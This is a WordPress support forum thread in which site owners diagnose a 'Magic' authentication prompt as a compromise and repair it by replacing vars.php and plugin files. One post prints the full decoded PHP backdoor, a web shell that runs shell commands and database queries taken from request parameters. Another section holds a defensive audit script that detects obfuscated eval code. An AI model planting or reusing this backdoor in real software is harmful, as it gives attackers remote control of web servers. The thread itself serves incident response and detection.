WordPress.org

[resolved] Can't post/edit: requesting authentication "magic" (30 posts)

  1. tshirtfiend
    Member
    Posted 5 years ago #

    I'm getting a strange error when I try to post, or edit posts (or add/edit any content). I get a browser alert window that says:

    Authentication Required

    A username and password are being requested by http://mysite.com. The site says: "Magic"

    Then it requests user and password. User and password entry doesn't work.

    I can log into the blog normally, without errors. I have reset my admin password, to no effect.

    Did I get hacked or something? How can I fix this?

  2. jkboho
    Member
    Posted 5 years ago #

    I fixed the problem by reuploading the root files, the wp-admin folder and the wp-includes folder from a backup of the site that I made a week ago. I didn't touch the content folder.

    If you don't have a backup, I imagine that if you download a fresh version from WordPress and recopy the files and folders listed above (being careful NOT to overwrite your wp-config file!), that would probably work, too. PIA, I know, but that's all I know to do until someone else figures out the source of the problem.

  3. jkboho
    Member
    Posted 5 years ago #

    Also, to clarify -- someone else pointed this out on another of my posts -- by replacing the "root files" I mean the files in the top-level folder. Replace them all but the wp-config file.

  4. tshirtfiend
    Member
    Posted 5 years ago #

    Ok, thanks. I'll give that a shot.

    Seems like a strange problem to have just out of the blue.

  5. fredeaker
    Member
    Posted 5 years ago #

    I was getting the same message as well. Even though I was already at 2.8.2, I performed the upgrade procedure, and now the message is gone.

  6. tshirtfiend
    Member
    Posted 5 years ago #

    I uploaded the files you suggested, in 3 groups:

    1. root files
    2. wp-admin directory
    3. wp-includes directory

    I tested after each one. It start working until the last files (wp-includes directory). If it happens again, I'll start there.

  7. tshirtfiend
    Member
    Posted 5 years ago #

    Oops. I meant: It DIDN'T start working until I uploaded the wp-includes directory.

  8. lovefabillar
    Member
    Posted 5 years ago #

    Yeah I'm having this exact kind of problem right now, reuploaded /wp-admin directory - problem remains.. reuploaded root files - problem remains.. Right now reuploading /wp-includes directory - still uploading..

    I only got this issue after installing the Plug-in "Tweet This", must have interfered with my other plug-ins?

    EDIT: Finished reuploading /wp-includes and the problem has been solved!

  9. robk30
    Member
    Posted 5 years ago #

    I'm having the same problem. How do I re-upload /wp-includes? Thanks!

  10. robk30
    Member
    Posted 5 years ago #

    I am using WP 2.7.1 - can I upload wp-includes from WP 2.8.2 or does it need to be the wp-includes from 2.7.1? If so, where can I get that?

  11. jkboho
    Member
    Posted 5 years ago #

    @robk: Go to the WordPress downloads area and it should have the old versions.

  12. robk30
    Member
    Posted 5 years ago #

    I got the "Magic" thing to go away, but now I am having issues with the sidebar and some other things on the blog. Do you think it's related? What else can I do to fix this problem? The blog I'm referring to:

    haironthebrain.com

  13. rchusid
    Member
    Posted 5 years ago #

    I assume this is some sort of attack as opposed to any form of error inherent to WordPress. I also fixed the problem for now by having it automatically reinstall WordPress.

    There's at least one other post here discussing the problem:
    http://wordpress.org/support/topic/295482

  14. rchusid
    Member
    Posted 5 years ago #

    robk30: Maybe your problem with sidebars is related to this problem but I wonder if it is coincidental. I had problems similar to yours recently and ultimately found it was because some formatting codes in text I had pasted in from another site had messed up WordPress. You might try checking recent posts to see if there are any html codes included, or try temporarily removing your posts from 7/30 to see if that fixes the problem.

  15. tstalcup
    Member
    Posted 5 years ago #

    Encountered the "Magic" problem with a client using v2.5.1 this morning. We, at least temporarily, solved the problem by reverting the wp-includes directory to a backup copy.

    We did a diff on the two directories and found that the vars.php file contained the infected code.

  16. tshirtfiend
    Member
    Posted 5 years ago #

    Does seem like it might be malicious, doesn't it? Simple fix…but I'm not sure that more damage wasn't done. Fingers crossed, passwords changed, etc.

  17. SoundTrip
    Member
    Posted 5 years ago #

    This just started on one of my user's sites. It looks like a hack to me. Has anyone gotten to the root of the problem?

  18. tdrpic
    Member
    Posted 5 years ago #

    I found that the WP sites could have been hacked using the Magic Shell script. You can find more information here:
    http://iboughtamac.com/2008/03/28/protecting-wordpress-from-magic-include-shell/

    Note that the information to remove the exploit is not the same in this case. Uploading a clean version of wp-includes/vars.php does fix it.

    While doing the research to solve this, I found two extra files that had a similar script included (eval() of base64_decode()). They had been uploaded to a subdirectory on wp-content/uploads/ and were fonction.php and wp-links.php.

    Good luck,

    Tomi

    Something for IT

  19. mbroyles
    Member
    Posted 4 years ago #

    The following code was found on my client's WP site in two separate plug-ins. Code was found at the top of each page (when you click the edit link for the plugin).

    I expanded the eval code. Here is what it expanded to:

    {
            if (!function_exists('______safeshell'))
            {
                    function ______safeshell($komut) {
                            @ini_restore("safe_mode");
                            @ini_restore("open_basedir");
                            $disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
                            if (!empty ($komut)) {
                                    if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
                                            //@ ob_start();
                                            @ passthru($komut);
                                            //$res = @ ob_get_contents();
                                            //@ ob_end_clean();
                                    }
                                    elseif (function_exists('system') && !in_array('system', $disable_functions)) {
                                            //@ ob_start();
                                            @ system($komut);
                                            //$res = @ ob_get_contents();
                                            //@ ob_end_clean();
                                    }
                                    elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
                                            $res = @ shell_exec($komut);
                                            echo $res;
                                    }
                                    elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
                                            @ exec($komut, $res);
                                            $res = join("\n", $res);
                                            echo $res, "\n";
                                    }
                                    elseif (@ is_resource($f = @ popen($komut, "r"))) {
                                            //$res = "";
                                            while (!@ feof($f)) {
                                                    //$res .= @ fread($f, 1024);
                                                    echo(@ fread($f, 1024));
                                            }
                                            @ pclose($f);
                                    }
                                    else
                                    {
                                            $res = <code>{$komut}</code>;
                                            echo $res;
                                    }
                            }
                    }
            };
    
            if (isset ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'])) {
                    echo "<php_5d14d8a172740f7088452acbd560c192_result>\n";
                    if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'eval') {
                            eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
                    }
                    else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'exec') {
                            ______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
                    }
                    else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'query') {
                            $result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
                            if (!$result)
                            {
                                    echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
                                    die();
                            }
                            else if (is_resource($result))
                            {
                                    $res = array();
                                    while ($row = mysql_fetch_assoc($result))
                                    {
                                            $res[] = $row;
                                    };
                                    mysql_free_result($result);
                                    echo serialize($res);
                                    die();
                            }
                            else
                            {
                                    echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
                                    die();
                            }
                    };
                    echo "\n</php_5d14d8a172740f7088452acbd560c192_result>\n";
                    die();
            };
    };

    Looks like it gives the ability to run shell commands and mysql DB queries via remote POST and GET requests.

  20. mbroyles
    Member
    Posted 4 years ago #

    Code was also found in the file:

    wp-includes/vars.php

    Removed the malicious code from the top of the file and no longer see the 'Magic' login prompt.
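The checks done by hand in this thread (diffing wp-includes against a backup, finding the eval() of base64_decode() line at the top of vars.php and plugin files, finding PHP files under wp-content/uploads) can be run in one pass. This is an added example, not part of any post: it assumes a clean copy of the same WordPress release is unpacked locally, the names `audit` and `demo`, the plugin path and the placeholder payload are constructed for illustration, and the pattern also covers other decode wrappers (gzuncompress, str_rot13) beyond the one shown here.

```python
import re
import tempfile
from pathlib import Path

# eval() wrapped around a decode chain, the shape of the injected line in this thread
OBFUSCATED_EVAL = re.compile(
    rb"eval\s*\(\s*(?:@?\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(\s*)+", re.I)
CORE_DIRS = ("wp-admin", "wp-includes")


def audit(site, clean):
    """Return sorted (relative path, finding) pairs for the PHP files under site."""
    site, clean, findings = Path(site), Path(clean), []
    for path in site.rglob("*.php"):
        rel = path.relative_to(site)
        name, data = rel.as_posix(), path.read_bytes()
        # Core = top-level files plus wp-admin/ and wp-includes/; wp-config.php is site-specific.
        if (len(rel.parts) == 1 or rel.parts[0] in CORE_DIRS) and name != "wp-config.php":
            ref = clean / rel
            if not ref.is_file():
                findings.append((name, "not in clean release"))
            elif data != ref.read_bytes():
                findings.append((name, "differs from clean release"))
        if OBFUSCATED_EVAL.search(data):
            findings.append((name, "eval of decoded data"))
        if rel.parts[:2] == ("wp-content", "uploads"):
            findings.append((name, "PHP file under uploads"))
    return sorted(findings)


def demo():
    """Audit a constructed tampered tree against a constructed clean one."""
    inject = b"<?php eval(gzinflate(base64_decode('Q09OU1RSVUNURUQ='))); ?>"  # inert placeholder
    core = {"index.php": b"<?php // front controller\n",
            "wp-includes/vars.php": b"<?php // browser detection\n"}
    site = {**core, "wp-config.php": b"<?php // local settings\n",
            "wp-includes/vars.php": inject + core["wp-includes/vars.php"],
            "wp-content/plugins/example/example.php": inject + b"<?php // plugin\n",
            "wp-content/uploads/2009/fonction.php": inject}
    root = Path(tempfile.mkdtemp())
    for tree, files in (("clean", core), ("site", site)):
        for name, body in files.items():
            (root / tree / name).parent.mkdir(parents=True, exist_ok=True)
            (root / tree / name).write_bytes(body)
    return audit(root / "site", root / "clean")


if __name__ == "__main__":
    for name, finding in demo():
        print(f"{finding:28} {name}")
```

Core files are compared byte for byte, so the clean tree has to be the exact release the site runs; plugins and themes are only pattern-matched and still need a comparison against their own clean downloads.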

  21. techartist
    Member
    Posted 4 years ago #

    I had the same problem, uploaded the wp-includes/vars.php file, and got the site back.

    I then upgraded to the latest version, and removed the eval() code from the top of one of my plugins.

    Hopefully, I won't be having any more problems from now on!

  22. qmagnets
    Member
    Posted 4 years ago #

    I hope people take the time to read all the way down to the bottom as it will save them a lot of time.
    I just replaced the vars.php file as well and it's all good.
    Thanks to those who contributed and paved the way to a simple fix!
    Now does anyone know WHY it happens, or do we care?

  23. jamiesulc
    Member
    Posted 4 years ago #

    I am having the same issue. Can someone walk me through fixing it? Thanks.

  24. SugaredHarpy
    Member
    Posted 4 years ago #

    qmagnets and all, thank you!

    Replacing the vars.php file did the trick.

    I would very much like to know why it happened, though. If anyone knows or has a guess, I'm all ears.

  25. monumentsinking
    Member
    Posted 4 years ago #

    I had the same issues with getting the whole you must authenticate to enter the "MAGIC" area.

    I replaced all of the root files, wp-admin, & wp-includes folder files with fresh copy of my 2.7.1 install and the issues went away.

  26. alism
    Member
    Posted 4 years ago #

    with fresh copy of my 2.7.1 install and the issues went away

    *sigh*

    Upgrade to the latest version!

    Don't just push the door to with the hope the burglars won't come back. Take down the flashing neon sign that says "PLEASE BURGLAR ME!", close the door and lock it.

  27. Celine Kiernan
    Member
    Posted 4 years ago #

    Alism, I can't upgrade. Each time I do it asks for my user name and password then tells me it's wrong. What do I do?

  28. Acquamarina
    Member
    Posted 4 years ago #

    Hi,
    Have the same problem. Uploaded original version of vars.php and it stopped the "Magic" pop up for login. It fixed the Magic issue but not the 403 error when trying to update and save template files. Permissions on the server are correct. Not sure what else to do.

    I also found the code in 2 plugins, which I deleted but the template edit/save permission denial is still there.

    Did anyone with the Magic issue also have a problem with saving updated templates?

    To complicate matters, I had upgraded to 2.9 right after solving the Magic issue and need to correct the Page template which is showing the default and not the custom one.

    Thanks!

  29. Acquamarina
    Member
    Posted 4 years ago #

    I just re-uploaded the include files but it made no difference. I still can't edit and save any templates.

  30. Larryhir
    Member
    Posted 4 years ago #

    Thanks for the info here. Just found in one of my client sites on updating. Code appears in the vars.php and 12 plug-ins. Using 2.7 on this site. What a mess. Does anyone know if 2.9 will solve this?

Topic Closed

This topic has been closed to new replies.